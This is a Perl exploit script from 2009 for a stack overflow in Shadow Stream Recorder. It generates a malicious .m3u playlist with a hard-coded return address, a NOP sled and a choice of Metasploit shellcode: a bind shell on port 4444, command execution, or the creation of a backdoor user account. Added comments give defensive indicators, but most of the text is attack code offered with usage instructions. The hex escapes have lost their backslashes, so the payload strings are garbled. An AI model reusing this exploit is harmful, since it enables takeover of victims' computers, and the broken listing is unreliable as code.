# Title : Shadow Stream Recorder (.m3u file) Universal Stack Overflow Exploit
# Published : 2009-04-14
# Author : AlpHaNiX
#!/usr/bin/perl
# Shadow Stream Recorder (.m3u file) Local Universal Stack Overflow Exploit
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###########
# program : Shadow Stream Recorder
# download : http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
# program homepage : http://www.mini-stream.net/shadow-stream-recorder/
##########
# Exploit In Action :
#[!] usage :
# ./sploit.pl bindshell
# ./sploit.pl cmdexec
# ./sploit.pl adduser
##########
# C:>sploit.pl bindshell
#[!] Done
# C:>nc localhost 4444
# Console - Windows Trust 3.0 (Service Pack 3: v5512)
#
#(C) 1985-2008 Microsoft Corp.
# Everything Tested Under Windows XP SP3 FR
# After Creating The File just open the program & drag and drop m3u evil file ! :)
# Print the usage banner and stop.  The bare "n" tokens are what the page
# shows (the original's escapes were evidently stripped on extraction); the
# string is reproduced exactly as printed.
sub help {
    my $usage = "[!] usage : n ./sploit.pl bindshell n ./sploit.pl cmdexec n ./sploit.pl adduser n ";
    print $usage;
    exit();
}
# --- Script body -------------------------------------------------------------
# Flat script: select a payload by the first CLI argument and write a crafted
# playlist, Exploit.m3u, into the current directory.  Nothing below touches
# the target process; per the header, the overflow is triggered later when the
# vulnerable player loads the file.
#
# NOTE(review): the "\x.." and "\n" escapes lost their backslashes during
# extraction ("x29xc9...", "[!] Done n"), so every string in this listing is
# plain ASCII and the sizes quoted in the generator comments (160/344/244)
# do not describe the bytes this listing would actually write.
#
# Defender's view: the static indicator for this family of .m3u exploits is a
# single playlist entry of ~26 KB ("http://" followed by 26117 'A's) — a
# legitimate playlist line never approaches that length.  The hard-coded
# return address is what makes the file OS/language-specific (tested only on
# Windows XP SP3 FR per the header); ASLR/DEP on later Windows versions
# undermines a fixed-address, stack-resident payload of this kind.
#
# `&help` is called with the legacy ampersand form and without parens; an
# argument of "0" is treated as absent because the check is on truthiness.
&help
unless $ARGV[0];
my $sploit = $ARGV[0];
# Filler: URL prefix plus 26117 'A's (see the indicator note above).
my $junk = "http://"."A" x 26117;
# Fixed 4-byte return address.  The page does not say which module it points
# into — presumably a non-rebased system DLL on XP SP3 FR; TODO confirm.
my $ret = "x63x46x92x7C";
# 30-byte NOP sled placed between the return address and the payload.
my $nope = "x90" x 30;
# Payloads: all three are stated to be Metasploit-generated with the
# PexFnstenvSub encoder (see each generator line).  EXITFUNC=seh on every
# payload; the bind shell listens on TCP 4444 and the adduser payload creates
# the local account named in its generator line — both are useful host/network
# indicators when triaging a machine that opened one of these files.
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
my $calc_shellcode =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9".
"x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05".
"xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09".
"x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d".
"xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26".
"x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64".
"xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb".
"xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28".
"xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44".
"x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38".
"xacx2cxc9x40" ;
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $bindshell =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x69".
"x45x3bx07x83xebxfcxe2xf4x95x2fxd0x4ax81xbcxc4xf8".
"x96x25xb0x6bx4dx61xb0x42x55xcex47x02x11x44xd4x8c".
"x26x5dxb0x58x49x44xd0x4exe2x71xb0x06x87x74xfbx9e".
"xc5xc1xfbx73x6ex84xf1x0ax68x87xd0xf3x52x11x1fx2f".
"x1cxa0xb0x58x4dx44xd0x61xe2x49x70x8cx36x59x3axec".
"x6ax69xb0x8ex05x61x27x66xaax74xe0x63xe2x06x0bx8c".
"x29x49xb0x77x75xe8xb0x47x61x1bx53x89x27x4bxd7x57".
"x96x93x5dx54x0fx2dx08x35x01x32x48x35x36x11xc4xd7".
"x01x8exd6xfbx52x15xc4xd1x36xccxdex61xe8xa8x33x05".
"x3cx2fx39xf8xb9x2dxe2x0ex9cxe8x6cxf8xbfx16x68x54".
"x3ax16x78x54x2ax16xc4xd7x0fx2dx2ax5bx0fx16xb2xe6".
"xfcx2dx9fx1dx19x82x6cxf8xbfx2fx2bx56x3cxbaxebx6f".
"xcdxe8x15xeex3exbaxedx54x3cxbaxebx6fx8cx0cxbdx4e".
"x3exbaxedx57x3dx11x6exf8xb9xd6x53xe0x10x83x42x50".
"x96x93x6exf8xb9x23x51x63x0fx2dx58x6axe0xa0x51x57".
"x30x6cxf7x8ex8ex2fx7fx8ex8bx74xfbxf4xc3xbbx79x2a".
"x97x07x17x94xe4x3fx03xacxc2xeex53x75x97xf6x2dxf8".
"x1cx01xc4xd1x32x12x69x56x38x14x51x06x38x14x6ex56".
"x96x95x53xaaxb0x40xf5x54x96x93x51xf8x96x72xc4xd7".
"xe2x12xc7x84xadx21xc4xd1x3bxbaxebx6fx99xcfx3fx58".
"x3axbaxedxf8xb9x45x3bx07";
# win32_adduser - PASS=alphanix EXITFUNC=seh USER=nullarea Size=244 Encoder=PexFnstenvSub http://metasploit.com
my $add_user =
"x2bxc9x83xe9xc9xd9xeexd9x74x24xf4x5bx81x73x13xca".
"x75xb1x0ax83xebxfcxe2xf4x36x9dxf5x0axcax75x3ax4f".
"xf6xfexcdx0fxb2x74x5ex81x85x6dx3ax55xeax74x5ax43".
"x41x41x3ax0bx24x44x71x93x66xf1x71x7excdxb4x7bx07".
"xcbxb7x5axfexf1x21x95x0exbfx90x3ax55xeex74x5ax6c".
"x41x79xfax81x95x69xb0xe1x41x69x3ax0bx21xfcxedx2e".
"xcexb6x80xcaxaexfexf1x3ax4fxb5xc9x06x41x35xbdx81".
"xbax69x1cx81xa2x7dx5ax03x41xf5x01x0axcax75x3ax62".
"xf6x2ax80xfcxaax23x38xf2x49xb5xcax5axa2x85x3bx0e".
"x95x1dx29xf4x40x7bxe6xf5x2dx16xdcx6exe4x10xc9x6f".
"xeax5axd2x2axa4x10xc5x2axbfx06xd4x78xeax1bxc4x66".
"xa6x14xc3x6fxabx55xd0x66xbax1dxd0x64xa3x0dx91x25".
"x8bx31xf5x2axecx53x91x64xafx01x91x66xa5x16xd0x66".
"xadx07xdex7fxbax55xf0x6exa7x1cxdfx63xb9x01xc3x6b".
"xbex1axc3x79xeax1bxc4x66xa6x14xc3x6fxabx55x9ex4b".
"x8ex31xb1x0a";
# Dispatch on the payload name.  Every branch writes the same layout —
# junk | ret | NOP sled | payload — to Exploit.m3u in the working directory.
# Code-quality caveat: 2-arg open on a bareword handle with no return-value
# check, so if the open fails (read-only directory) the branch still prints
# "[!] Done".  Unknown names fall through to the usage banner.
if ($sploit eq 'bindshell')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$bindshell;close(file);print "[!] Done n";}
elsif ($sploit eq 'cmdexec')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$calc_shellcode;close(file);print "[!] Done n"}
elsif ($sploit eq 'adduser')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$add_user;close(file);print "[!] Done n"}
else {&help}
# www.Syue.com [2009-04-14]